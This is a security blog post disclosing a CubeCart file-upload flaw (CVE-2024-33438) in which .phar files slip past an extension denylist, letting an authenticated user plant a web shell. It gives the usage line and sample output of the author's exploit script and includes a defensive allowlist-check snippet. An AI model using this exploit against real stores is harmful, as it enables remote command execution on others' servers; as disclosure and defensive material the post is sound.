bulio

An all things security blog and personal journal.

5 May 2024

CubeCart < 6.5.5 - Authenticated File Upload May Lead To RCE (CVE-2024-33438)

TL;DR

Although the application blocks most PHP extensions (e.g. .php, .php4, .php5, .phtml) from being uploaded to the web server, the .phar extension is not blocked. An authenticated user with “edit” permissions on CubeCart’s file manager can upload a web shell via File Manager > Images and execute commands remotely.
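A defender's view of the gap described above, as an added example (not CubeCart's code and not the PoC): a denylist built from the extensions this post names lets `.phar` through, an allowlist does not, and `audit_upload_dir` lists files already on disk that the allowlist would reject. The image allowlist, the function names and the sample upload tree are assumptions constructed for illustration.

```python
import os
import tempfile

# Denylist modelled on the extensions the post names as blocked (constructed, not CubeCart's code).
BLOCKED_EXTS = {".php", ".php4", ".php5", ".phtml"}
# Assumption: an image manager only needs to accept these types.
IMAGE_EXTS = {".jpg", ".jpeg", ".png", ".gif", ".webp"}


def extensions(filename):
    """Return every dot-separated extension, lower-cased: 'a.php.png' -> ['.php', '.png']."""
    base = os.path.basename(filename.replace("\\", "/")).lower()
    return ["." + part for part in base.split(".")[1:]]


def denylist_allows(filename):
    """Flawed check: reject only when the final extension is on the known-bad list."""
    exts = extensions(filename)
    return not exts or exts[-1] not in BLOCKED_EXTS


def allowlist_allows(filename):
    """Hardened check: exactly one extension, and it must be a known image type."""
    exts = extensions(filename)
    return len(exts) == 1 and exts[0] in IMAGE_EXTS


def audit_upload_dir(root):
    """Return relative paths of files already on disk that the allowlist would reject."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not allowlist_allows(name):
                findings.append(os.path.relpath(os.path.join(dirpath, name), root))
    return sorted(findings)


def demo():
    """Build a constructed upload tree in a temp directory and audit it."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "products"))
        for rel in ("logo.png", "products/shoe.JPG", "products/x.phar", "banner.php.png"):
            open(os.path.join(root, rel), "w").close()
        return audit_upload_dir(root)


if __name__ == "__main__":
    print(demo())
```

Pointing `audit_upload_dir` at a store's real image upload directory gives a quick check for leftover non-image files after patching.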

Automated Exploit

I wrote an exploit in Python that automates the whole process of uploading a file and executing a command. You can download it here.

PoC usage:

Usage: python3 CubeCartCVE.py <URL> <username> <password> <command>

After running it, this is the expected output for successful exploitation:

python3 CubeCartCVE.py http://localhost/admin_0Kqnr9.php admin 123456 whoami

     []  ,----.___
   __||_/___      '.
  / O||    /|
 /   ""   / /
/________/ /   launching exploit
|________|/    please wait...

[+] Trying to log into the application...
[+] Successful login. Uploading a simple web shell to the server...
[+] Executing command...

Output: www-data
